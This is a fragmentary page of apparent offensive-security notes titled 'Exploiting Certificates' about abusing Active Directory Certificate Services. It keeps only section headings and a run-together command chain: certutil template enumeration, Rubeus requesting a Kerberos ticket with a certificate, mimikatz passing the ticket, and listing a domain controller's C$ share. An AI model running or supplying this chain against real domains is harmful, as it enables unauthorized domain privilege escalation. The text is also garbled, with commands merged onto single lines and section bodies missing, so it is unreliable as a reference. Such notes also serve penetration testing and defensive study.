Exploiting Certificates
Resources
What is AD Certificate Services?
Certificate templates
Exploitation example
Note
Last updated
Last updated
C:\>certutil -Template -v > templates.txtrubeus.exe asktgt /user:<user> /enctype:aes256 /certificate:<path_to_certificate> /password:<certificate_file_password> /outfile:<output_filename> /domain:<domain> /dc:<IP_of_DC>mimikatz # privilege::debug
mimikatz # kerberos::ptt <TGT_file_location>.kirbi
mimikatz # exitC:\> dir \\DC.TEST.COM\C$